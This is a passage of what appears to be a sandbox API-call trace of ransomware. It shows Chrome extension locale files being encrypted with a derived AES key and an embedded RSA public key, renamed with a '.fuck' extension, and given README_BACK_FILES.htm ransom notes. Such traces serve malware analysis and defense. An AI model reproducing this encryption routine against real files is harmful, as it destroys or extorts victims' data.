CryptDestroyHash (hHash=0x2e186a8) returned 1 [0255.867] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.867] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.867] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.867] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0255.867] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\readme_back_files.htm")) returned 0xffffffff [0255.867] AreFileApisANSI () returned 1 [0255.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0255.867] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.868] GetFileType (hFile=0x5d50) returned 0x1 [0255.869] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.870] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.870] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.870] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.870] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.871] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.871] GetLastError () returned 0x0 [0255.871] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json")) returned 0x20 [0255.871] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x80) returned 1 [0255.872] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.873] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.874] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.875] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.877] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.877] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0255.878] CryptHashData (hHash=0x2e180e8, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.878] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.878] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.878] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.878] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12a20) returned 1 [0255.878] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12a20, dwCertEncodingType=0x1, pInfo=0x2e2a4b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a4e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a4e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e192a8) returned 1 [0255.878] CryptEncrypt (in: hKey=0x2e192a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.878] CryptEncrypt (in: hKey=0x2e192a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e125e0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e125e0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.879] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e125e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e125e0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.879] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xaa, lpOverlapped=0x0) returned 1 [0255.880] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xaa, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0255.880] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0255.880] CloseHandle (hObject=0x5d5c) returned 1 [0255.880] CloseHandle (hObject=0x5d60) returned 1 [0255.881] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), bFailIfExists=0) returned 1 [0255.884] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x0) returned 1 [0255.884] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json.gsg")) returned 1 [0255.885] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json.fuck")) returned 1 [0255.887] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0255.887] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.887] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.887] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.887] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.887] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\readme_back_files.htm")) returned 0xffffffff [0255.888] AreFileApisANSI () returned 1 [0255.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0255.888] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.888] GetFileType (hFile=0x5d50) returned 0x1 [0255.889] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.890] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.890] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0255.890] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.890] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.890] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.890] GetLastError () returned 0x0 [0255.890] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json")) returned 0x20 [0255.890] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json", dwFileAttributes=0x80) returned 1 [0255.891] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.892] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.892] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.893] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.895] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.895] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0255.895] CryptHashData (hHash=0x2e18128, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.895] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e186a8) returned 1 [0255.895] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.895] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.895] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12668) returned 1 [0255.896] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12668, dwCertEncodingType=0x1, pInfo=0x2e29bc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29bf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29bf8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19268) returned 1 [0255.896] CryptEncrypt (in: hKey=0x2e19268, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.896] CryptEncrypt (in: hKey=0x2e19268, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e126f0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e126f0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.896] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e126f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e126f0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.897] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc2, lpOverlapped=0x0) returned 1 [0255.898] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0255.898] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0255.898] CloseHandle (hObject=0x5d60) returned 1 [0255.898] CloseHandle (hObject=0x5d5c) returned 1 [0255.899] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), bFailIfExists=0) returned 1 [0255.901] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json", dwFileAttributes=0x0) returned 1 [0255.902] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.gsg")) returned 1 [0255.903] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.fuck")) returned 1 [0255.904] CryptDestroyHash (hHash=0x2e18128) returned 1 [0255.904] CryptDestroyKey (hKey=0x2e186a8) returned 1 [0255.904] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.905] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.905] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0255.905] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\readme_back_files.htm")) returned 0xffffffff [0255.905] AreFileApisANSI () returned 1 [0255.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.905] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.906] GetFileType (hFile=0x5d50) returned 0x1 [0255.906] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.907] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0255.907] FindClose (in: hFindFile=0x2e182e8 | out: hFindFile=0x2e182e8) returned 1 [0255.907] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\readme_back_files.htm")) returned 0xffffffff [0255.907] AreFileApisANSI () returned 1 [0255.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 150 [0255.907] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 